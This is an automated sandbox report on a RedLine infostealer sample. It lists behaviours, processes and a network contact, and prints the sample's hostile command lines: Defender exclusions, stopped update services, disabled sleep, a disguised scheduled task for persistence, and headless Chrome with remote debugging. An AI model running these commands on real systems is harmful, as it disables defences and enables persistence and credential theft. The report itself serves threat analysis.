Malware Analysis Report

2025-01-18 08:58

Sample ID 230811-adrczahf95
Target 43866279c665ce788216110e56726c1b82817ab79bbc9.exe
SHA256 43866279c665ce788216110e56726c1b82817ab79bbc9c13be309043455a74a4
Tags
redline logsdiller cloud (tg: @logsdillabot) infostealer spyware stealer evasion themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

43866279c665ce788216110e56726c1b82817ab79bbc9c13be309043455a74a4

Threat Level: Known bad

The file 43866279c665ce788216110e56726c1b82817ab79bbc9.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) infostealer spyware stealer evasion themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Reads user/profile data of web browsers

Themida packer

Executes dropped EXE

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-11 00:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-11 00:06

Reported

2023-08-11 00:08

Platform

win7-20230712-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe"

Signatures

RedLine

infostealer redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe

"C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe"

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp

Files

memory/2620-54-0x0000000002460000-0x0000000002560000-memory.dmp

memory/2620-55-0x0000000000400000-0x00000000022FC000-memory.dmp

memory/2620-56-0x0000000000220000-0x000000000025F000-memory.dmp

memory/2620-57-0x0000000003F90000-0x0000000003FC8000-memory.dmp

memory/2620-58-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/2620-59-0x00000000068B0000-0x00000000068F0000-memory.dmp

memory/2620-60-0x00000000068B0000-0x00000000068F0000-memory.dmp

memory/2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp

memory/2620-62-0x00000000023F0000-0x00000000023F6000-memory.dmp

memory/2620-63-0x00000000068B0000-0x00000000068F0000-memory.dmp

memory/2620-64-0x0000000002460000-0x0000000002560000-memory.dmp

memory/2620-66-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/2620-67-0x00000000068B0000-0x00000000068F0000-memory.dmp

memory/2620-68-0x0000000000400000-0x00000000022FC000-memory.dmp

memory/2620-69-0x0000000002460000-0x0000000002560000-memory.dmp

memory/2620-70-0x0000000074430000-0x0000000074B1E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-11 00:06

Reported

2023-08-11 00:08

Platform

win10v2004-20230703-en

Max time kernel

68s

Max time network

113s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4748 created 3160 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4748 created 3160 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4748 created 3160 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4748 created 3160 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3872 set thread context of 4952 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4476 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4476 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3512 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3512 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4476 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4476 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4476 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3872 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3872 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3872 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3872 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3872 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4476 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4476 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4476 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4220 wrote to memory of 1684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 1684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 2196 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 2196 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 4296 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 4296 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 4296 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4220 wrote to memory of 4296 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe

"C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3872 -ip 3872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 284

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 2632

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=44251 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffec0fb9758,0x7ffec0fb9768,0x7ffec0fb9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1360 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1668 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=44251 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1976 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2364 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2512 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3148 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3304 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1
